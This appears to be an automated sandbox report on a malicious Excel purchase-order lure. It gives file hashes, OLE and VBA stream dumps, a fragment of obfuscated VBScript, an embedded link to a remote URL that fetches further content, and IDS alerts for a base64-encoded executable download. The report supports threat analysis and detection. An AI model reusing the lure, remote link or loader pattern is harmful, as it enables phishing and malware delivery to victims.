SHA1:	7D6131261E7F6A54291BD9E02EB7C985E093CFA7
SHA-256:	95F59C4235C1D4516B7D5DE5A768F0F00C4A64C73A5BE26FB26496AC5F378E9B
SHA-512:	422B39ACB1DCACC05938EE122FA614A9A429E28A6A7F7ECF8A7F8416823B0E7ADA11C28B7FE52AE1352D85FC99423FFDB16FD85EC2AC27F25A2F3ADFED7B638C
Malicious:	true
Preview:	..........F.u.n.c.t.i.o.n. .d.e.s.c.a.b.i.d.o.(.B.y.V.a.l. .e.s.p.i.n.e.t.a.,. .B.y.V.a.l. .m.a.l.h.a.d.o.,. .B.y.V.a.l. .c.o.n.u.b.i.a.l.)..... . . . .D.i.m. .d.e.s.c.o.a.l.h.o..... . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .d.e.s.c.o.a.l.h.o. .>. .0..... . . . . . . . .e.s.p.i.n.e.t.a. .=. .L.e.f.t.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .-. .1.). .&. .c.o.n.u.b.i.a.l. .&. .M.i.d.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.m.a.l.h.a.d.o.).)..... . . . . . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.c.o.n.u.b.i.a.l.).,. .e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.c.a.b.i.d.o. .=. .e.s.p.i.n.e.t.a.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .

C:\Users\user\Desktop\62A30000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:50:19 2024, Security: 1
Category:	dropped
Size (bytes):	935936
Entropy (8bit):	7.985921161497815
Encrypted:	false
SSDEEP:	24576:2tvs1atMURwSNjBKzKKziRNVz9ZxtkQiAib/gT:Wvs1cMUR/NjBKuKzw7z9fKQVi
MD5:	9A12A56DE957D1A0DC2E9B7FA92717C5
SHA1:	B689AF3EFDBB58D7AA0C1B0D40502C63E65E344F
SHA-256:	7252025A660A70035B236BC3FC7DBB4220F17576B348B5DED1777F79FE7F9F10
SHA-512:	4A91FDDD165FF1AB76992C943FD5EBA64A9C43C125A0856F867378F047F92F21526DEA253BCF4EC32EEC71B4C30BB5015983777A6B620E9C133C5BC2E6550D64
Malicious:	false
Preview:	......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\62A30000:Zone.Identifier

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\Env#U00edo de Orden de Compra No. 43456435344657.xla.xls (copy)

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:50:19 2024, Security: 1
Category:	dropped
Size (bytes):	935936
Entropy (8bit):	7.985921161497815
Encrypted:	false
SSDEEP:	24576:2tvs1atMURwSNjBKzKKziRNVz9ZxtkQiAib/gT:Wvs1cMUR/NjBKuKzw7z9fKQVi
MD5:	9A12A56DE957D1A0DC2E9B7FA92717C5
SHA1:	B689AF3EFDBB58D7AA0C1B0D40502C63E65E344F
SHA-256:	7252025A660A70035B236BC3FC7DBB4220F17576B348B5DED1777F79FE7F9F10
SHA-512:	4A91FDDD165FF1AB76992C943FD5EBA64A9C43C125A0856F867378F047F92F21526DEA253BCF4EC32EEC71B4C30BB5015983777A6B620E9C133C5BC2E6550D64
Malicious:	false
Preview:	......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	modified
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Nov 19 13:01:02 2024, Security: 1
Entropy (8bit):	7.980997668767013
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx
File size:	1'136'128 bytes
MD5:	73346e64a29d684532eca0a6a17e8f4c
SHA1:	61980a1ee86bfe46bccfc5d2262c635dc06bf6b6
SHA256:	18675f25203e08b39f835cec09a3697c6b1998dadcf22ba528828184f9f4515a
SHA512:	9e821cbde002e872c03ef05adfe720efebb729a655747bde5d8e81e2949bc199b3c3774d476610d24a5b37b4c69c0cad521561904030e6657bf1aed27d007dda
SSDEEP:	24576:Auq9PLiijE2Z5Z2am4ZFb9+k5HbW3kZiyihBMpOLpEI:AuEPLiij7Z5ZKA9l5HbWUsK0
TLSH:	35352314FECADF87EA9A183308C6C5B30648BC96AE14D7023A64B34F75795B16F9709C
File Content Preview:	........................>.......................................................................................................i.......k.......m..............................................................................................................

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-11-19 13:01:02
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 07 04 2f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . V { . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 07 56 7b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 07 87 a7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 12 07 b6 53 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2503503175049815
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . : . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD00438512/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD00438512/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00438512/Package, File Type: Microsoft Excel 2007+, Stream Size: 781883

General
Stream Path:	MBD00438512/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	781883
Entropy:	7.996214837698594
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . j A 3 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 6a 41 33 c9 e9 01 00 00 fc 08 00 00 13 00 e1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00438513/\x1Ole, File Type: data, Stream Size: 364

General
Stream Path:	MBD00438513/\x1Ole
CLSID:
File Type:	data
Stream Size:	364
Entropy:	4.93500415353831
Base64 Encoded:	True
Data ASCII:	. . . . S z . ] B U : . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . p . r . o . v . i . t . . . u . k . / . w . U . E . 3 . Z . l . ? . & . t . e . m . p . l . e . = . s . t . a . n . d . i . n . g . & . s . t . e . p . s . = . o . v . e . r . w . r . o . u . g . h . t . & . o . f . f . i . c . i . a . l . = . h . u . s . h . e . d . & . p . r . e . s . s . u . r . i . s . a . t . i . o . n . . . . C ? ~ P j Y . . = } V ` \\ . ~ < E @ . . [ 8 . ~ . ) U q f . . . . . . . .
Data Raw:	01 00 00 02 53 7a 0a 5d 42 55 3a 18 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f4 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 70 00 72 00 6f 00 76 00 69 00 74 00 2e 00 75 00 6b 00 2f 00 77 00 55 00 45 00 33 00 5a 00 6c 00 3f 00 26 00 74 00 65 00 6d 00 70 00 6c 00 65 00 3d 00 73 00 74 00 61 00 6e 00 64 00 69 00 6e 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 330971

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	330971
Entropy:	7.998711374689028
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . 9 s [ ? S 7 I 2 : [ I $ . ! 7 G 8 0 U . . v . . . q . . . . . . . . . . Y 1 . . . \\ . p . g Q : 7 . * . p c t s 5 + G = A k f . . g + p e C 3 . Q ] 7 q . G > # u . . [ ` Q . 3 F . . n < . . < \| ( ? A Q . . B . . . g a . . . / . . . = . . . X u . . . . . . Q . B % a . . . . . . . . X . . . . . P . . . . . ? . . . . . . > = . . . ~ . * n * n [ . @ . . . . . . . " . . . 4 . . . . . . . . . . z 1 . . . K . v E I , . . . . f M P w . H 1 . . . > E . . = ( . p
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 39 73 5b 3f ae 53 ff f1 37 d4 49 32 3a b2 5b 49 a1 24 9b 0e b2 88 ed 21 37 47 38 96 dd 30 e2 a0 55 c1 00 92 ab d1 9c 76 a5 f7 1b 1b a0 1c 71 e3 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 59 31 e2 00 00 00 5c 00 70 00 c2 67 ff cf e4 df 51 b2 de 3a a3 e0 37 b5 d7 a0 2a 0c 70 63 74 ac c2 df 73 b9

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	527
Entropy:	5.1944296645182355
Base64 Encoded:	True
Data ASCII:	I D = " { D B C 1 E 8 5 0 - 8 2 1 C - 4 0 D 4 - 9 E 6 4 - 2 3 D 9 5 A D 7 0 B B C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A F A D 5 B 9 4 A 5 F C D E 0 0 D
Data Raw:	49 44 3d 22 7b 44 42 43 31 45 38 35 30 2d 38 32 31 43 2d 34 30 44 34 2d 39 45 36 34 2d 32 33 44 39 35 41 44 37 30 42 42 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.9893293548381012
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.35161925632931
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 9 N i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 39 d4 4e 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-20T07:49:57.045480+0100	2057635	ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound	1	192.3.22.13	80	192.168.2.22	49167	TCP
2024-11-20T07:49:57.045480+0100	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	192.3.22.13	80	192.168.2.22	49167	TCP
